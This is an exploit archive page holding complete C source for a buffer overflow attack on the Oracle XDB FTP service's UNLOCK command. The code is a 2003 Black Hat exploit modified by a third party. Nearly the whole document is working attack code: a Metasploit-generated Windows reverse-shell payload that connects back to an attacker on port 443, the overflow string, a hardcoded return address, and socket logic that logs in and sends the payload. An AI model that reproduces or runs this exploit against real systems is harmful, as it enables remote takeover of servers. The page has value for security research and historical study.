Oracle XDB FTP Server Buffer Overflow

This is the original ngssoftware's (David Litchfield) exploit presented at blackhat 2003 with modified offsets.


MD5 | 7723855857e211808b0b5927ee03b682

/***************************************************************************************************************** 
This is the original ngssoftware's (David Litchfield) exploit presented at blackhat 2003 with modified offsets -
Tested and working on Windows 2000 server Oracle XML DB/Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production

RETADDR & SEH Ported from MSF

Modified by D7X
www.promiselabs.net

Instructions: Swap shellcode, then compile using mingw and lws2_32 lib
Original exploit code: https://www.exploit-db.com/exploits/80/
*****************************************************************************************************************/

#include <stdio.h>
#include <windows.h>
#include <winsock.h>

int GainControlOfOracle(char *, char *);
int StartWinsock(void);

struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";

unsigned char shellcode[] =
/* msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=(omitted) LPORT=443 -e x86/shikata_ga_nai -f c -b '\x00\x20\x0a\x0d' -n 449 */
/* 800 bytes (351 + 449 bytes NOPsled -> */
"\x99\x98\x91\x99\xf5\xf9\x93\x98\xf8\xf5\xfd\x3f\x99\x99\xf5"
"\x4b\x4a\x40\x40\x99\xf5\x3f\xd6\x99\xf5\xfc\x48\x98\xf5\x91"
"\x49\xfd\xf5\x49\x3f\x93\xf5\x9b\x4a\x92\x98\x3f\x48\x40\xf5"
"\x98\x93\xf9\x27\x3f\x37\xf9\x49\x37\x43\x41\x42\x3f\x91\x49"
"\x2f\x27\x90\x9b\x91\xf9\x37\x98\xf8\x4b\x4a\xd6\xf9\x91\x2f"
"\x37\xfc\xfc\x49\xfc\xf8\x91\x91\xf5\x4b\xfd\xf5\xf9\x40\xfc"
"\x27\x2f\xfd\x98\x40\xd6\x90\xfd\x99\xd6\x49\x91\x93\xd6\x4b"
"\x3f\x90\x40\x43\x37\xf8\x43\x90\x9f\x90\xfd\xfc\x4a\x91\x99"
"\xf9\x4b\x9f\x3f\x3f\x42\x48\xf9\x99\x99\x43\x4a\xfd\x4b\x2f"
"\x2f\x93\x9b\x49\x4b\x93\x43\x9b\x4b\x48\x49\xfd\xf5\x92\x37"
"\x48\x2f\xd6\x9b\x49\x4a\xd6\xfd\x4b\x41\x9f\x48\x91\x42\x98"
"\x9b\x99\x42\x49\x40\x91\xd6\x90\x99\x41\x4b\x48\xfd\xfd\x93"
"\x3f\x90\x2f\x92\x4a\x48\x9f\xd6\x9b\x27\x41\x43\x90\x42\x37"
"\x49\x41\x2f\x90\x40\x40\x4a\xfc\xf9\x92\x2f\xf9\x9f\x4b\x40"
"\x48\xd6\xd6\xfd\x98\x92\xfd\x4b\x92\xfd\x91\x40\x4b\x98\x91"
"\xf8\x27\x92\x37\x3f\x42\xf8\x37\x27\xfd\x99\xf9\xf5\x9b\xd6"
"\x93\xd6\x4b\x92\x93\x40\x91\x90\x99\xf8\x40\xfc\x27\x90\x48"
"\x91\xfd\xfd\xf8\x9b\x92\x99\x9f\xfd\x90\xf9\xfd\x42\xf5\xf9"
"\x92\x93\x42\x27\x93\xd6\x98\x3f\x90\xd6\x2f\x98\x42\x93\x9b"
"\x4b\xf8\xf9\xf9\x42\xfd\xf8\x2f\x9b\x2f\x9f\xf8\x40\xfc\xf9"
"\x41\x99\x3f\xf8\xf5\xd6\x40\x92\x3f\x37\xfd\x37\xfd\x90\x98"
"\xfc\x2f\xf9\x48\x42\x9f\x9f\x93\x99\xfd\xf5\xf8\x93\x3f\xfc"
"\xfc\xf9\x43\x9f\x42\x37\x98\xf8\x49\xf9\x48\x90\x4a\x37\x99"
"\x92\xfc\x2f\x98\xd6\xfd\x42\x37\x42\x27\x43\x99\xd6\xf8\xfd"
"\x3f\x93\x3f\x9f\x49\x4b\xf8\x2f\x41\x92\x42\x3f\x4b\xd6\x2f"
"\xf8\x90\xfc\x99\x99\x93\x9f\x9f\xd6\x93\x92\xfc\x2f\x93\x49"
"\x4a\x43\x9f\x98\x27\x98\x48\xf9\x9f\x98\x9b\x93\xfc\x49\x43"
"\x42\x93\x4a\xfc\x41\x48\xfd\xd6\x27\x48\xfc\xf9\x3f\x43\x27"
"\x90\xd6\x43\x41\x92\x4b\xd6\x27\xf9\xf9\x4a\x49\x99\x9b\xd6"
"\x49\x41\x42\x43\x43\x4b\x91\xfc\xf9\x40\xf8\x93\x91\x3f\xba"
"\xa4\x90\xe1\x9e\xd9\xc2\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x52"
"\x31\x50\x12\x83\xc0\x04\x03\xf4\x9e\x03\x6b\x08\x76\x41\x94"
"\xf0\x87\x26\x1c\x15\xb6\x66\x7a\x5e\xe9\x56\x08\x32\x06\x1c"
"\x5c\xa6\x9d\x50\x49\xc9\x16\xde\xaf\xe4\xa7\x73\x93\x67\x24"
"\x8e\xc0\x47\x15\x41\x15\x86\x52\xbc\xd4\xda\x0b\xca\x4b\xca"
"\x38\x86\x57\x61\x72\x06\xd0\x96\xc3\x29\xf1\x09\x5f\x70\xd1"
"\xa8\x8c\x08\x58\xb2\xd1\x35\x12\x49\x21\xc1\xa5\x9b\x7b\x2a"
"\x09\xe2\xb3\xd9\x53\x23\x73\x02\x26\x5d\x87\xbf\x31\x9a\xf5"
"\x1b\xb7\x38\x5d\xef\x6f\xe4\x5f\x3c\xe9\x6f\x53\x89\x7d\x37"
"\x70\x0c\x51\x4c\x8c\x85\x54\x82\x04\xdd\x72\x06\x4c\x85\x1b"
"\x1f\x28\x68\x23\x7f\x93\xd5\x81\xf4\x3e\x01\xb8\x57\x57\xe6"
"\xf1\x67\xa7\x60\x81\x14\x95\x2f\x39\xb2\x95\xb8\xe7\x45\xd9"
"\x92\x50\xd9\x24\x1d\xa1\xf0\xe2\x49\xf1\x6a\xc2\xf1\x9a\x6a"
"\xeb\x27\x0c\x3a\x43\x98\xed\xea\x23\x48\x86\xe0\xab\xb7\xb6"
"\x0b\x66\xd0\x5d\xf6\xe1\xd5\xaa\xf8\xab\x81\xae\xf8\x4a\xe9"
"\x26\x1e\x26\x1d\x6f\x89\xdf\x84\x2a\x41\x41\x48\xe1\x2c\x41"
"\xc2\x06\xd1\x0c\x23\x62\xc1\xf9\xc3\x39\xbb\xac\xdc\x97\xd3"
"\x33\x4e\x7c\x23\x3d\x73\x2b\x74\x6a\x45\x22\x10\x86\xfc\x9c"
"\x06\x5b\x98\xe7\x82\x80\x59\xe9\x0b\x44\xe5\xcd\x1b\x90\xe6"
"\x49\x4f\x4c\xb1\x07\x39\x2a\x6b\xe6\x93\xe4\xc0\xa0\x73\x70"
"\x2b\x73\x05\x7d\x66\x05\xe9\xcc\xdf\x50\x16\xe0\xb7\x54\x6f"
"\x1c\x28\x9a\xba\xa4\x58\xd1\xe6\x8d\xf0\xbc\x73\x8c\x9c\x3e"
"\xae\xd3\x98\xbc\x5a\xac\x5e\xdc\x2f\xa9\x1b\x5a\xdc\xc3\x34"
"\x0f\xe2\x70\x34\x1a";


char exploit_code[8000]=
"\x55\x4e\x4c\x4f\x43\x4b\x20\x2f\x20\x7a\x61\x3a\x41\x27\x3b\x60"
"\x7a\x55\x4a\x3f\x5c\x3e\x46\x45\x74\x2f\x5e\x59\x71\x23\x24\x78"
"\x70\x25\x52\x51\x5b\x4a\x59\x63\x3b\x40\x43\x4f\x44\x32\x2e\x69"
"\x48\x5c\x72\x30\x3c\x22\x3e\x45\x67\x41\x5e\x58\x6b\x54\x71\x4e"
"\x35\x53\x61\x71\x7d\x3d\x5b\x52\x50\x3f\x72\x5f\x62\x2e\x7b\x4f"
"\x46\x23\x23\x74\x5c\x4a\x5f\x32\x28\x43\x41\x5b\x21\x25\x2f\x28"
"\x4b\x22\x3f\x5b\x5c\x26\x5a\x35\x50\x26\x7a\x77\x7b\x6d\x30\x69"
"\x31\x39\x38\x24\x33\x34\x41\x4d\x22\x71\x7b\x54\x27\x7c\x3f\x42"
"\x4c\x6c\x2f\x44\x38\x4e\x54\x4c\x25\x64\x53\x74\x47\x78\x47\x2d"
"\x47\x41\x29\x42\x59\x2f\x58\x38\x62\x78\x72\x67\x23\x5b\x5d\x5b"
"\x4a\x60\x68\x6f\x57\x6b\x56\x57\x2f\x71\x2e\x49\x32\x4a\x2b\x3e"
"\x29\x53\x6f\x21\x6d\x3b\x3b\x3a\x51\x55\x37\x37\x30\x54\x2c\x40"
"\x4b\x5c\x5c\x50\x30\x5b\x3d\x22\x64\x5d\x40\x5b\x3a\x69\x66\x72"
"\x22\x2d\x2b\x7a\x47\x37\x76\x5e\x2f\x72\x7c\x3a\x3f\x50\x54\x5b"
"\x6b\x48\x7e\x31\x79\x2c\x66\x24\x61\x65\x63\x42\x55\x58\x3b\x2b"
"\x66\x31\x55\x2d\x5b\x50\x79\x66\x75\x43\x64\x62\x7e\x68\x57\x4b"
"\x2e\x52\x73\x4a\x21\x4e\x4f\x29\x34\x25\x41\x4f\x78\x3c\x23\x7b"
"\x60\x71\x57\x43\x7a\x77\x7d\x56\x2b\x68\x5d\x2c\x4d\x42\x70\x7a"
"\x34\x6c\x62\x69\x49\x6d\x2f\x56\x52\x5a\x35\x21\x43\x74\x48\x61"
"\x47\x50\x6e\x7d\x47\x4b\x6b\x64\x5b\x30\x76\x6a\x2b\x3e\x6e\x54"
"\x36\x22\x64\x3f\x66\x4a\x62\x59\x57\x25\x6e\xeb\x06\x6d\x46";


char RET[8]="\x46\x6d\x61\x60"; /* RET -- 0x60616d46, # oraclient9.dll (pop/pop/ret) */ /* Tested on Windows 2000 Server */

int main(int argc, char *argv[])
{
if(argc != 4)
{
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
printf("\n\n\tUsage:\t%s host userid password",argv[0]);
printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
printf("\n\t*** Modified by D7X\n\n\n");
return 0;
}
strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock.\n");
strcat(exploit_code,RET);
strcat(exploit_code,shellcode);
strcat(exploit_code,"\r\n");


GainControlOfOracle(argv[2],argv[3]);
return 0;
}



int StartWinsock() {
int err=0; WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{ WSACleanup( );
return 0; }


if (isalpha(host[0])) {
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
} else
{ addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
he = (struct hostent *)1;
}
if (he == NULL) {
return 0; }
return 1; }


int GainControlOfOracle(char *user, char *pass) {
char usercmd[260]="USER ";
char passcmd[260]="PASS ";
char resp[1600]="";
int snd=0,rcv=0;
struct sockaddr_in r_addr;
SOCKET sock;


strncat(usercmd,user,230);
strcat(usercmd,"\r\n");
strncat(passcmd,pass,230);
strcat(passcmd,"\r\n");


sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);

s_sa.sin_port=htons((unsigned short)2100);
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);
snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp); ZeroMemory(resp,1600);


snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
if(resp[0]=='5')
{ closesocket(sock);
return printf("Failed to log in using user %s and password %s.\n",user,pass);
}
ZeroMemory(resp,1600);
snd=send(sock, exploit_code, strlen(exploit_code) , 0);
Sleep(2000);
closesocket(sock);
return 0;
}


Related Posts

Comments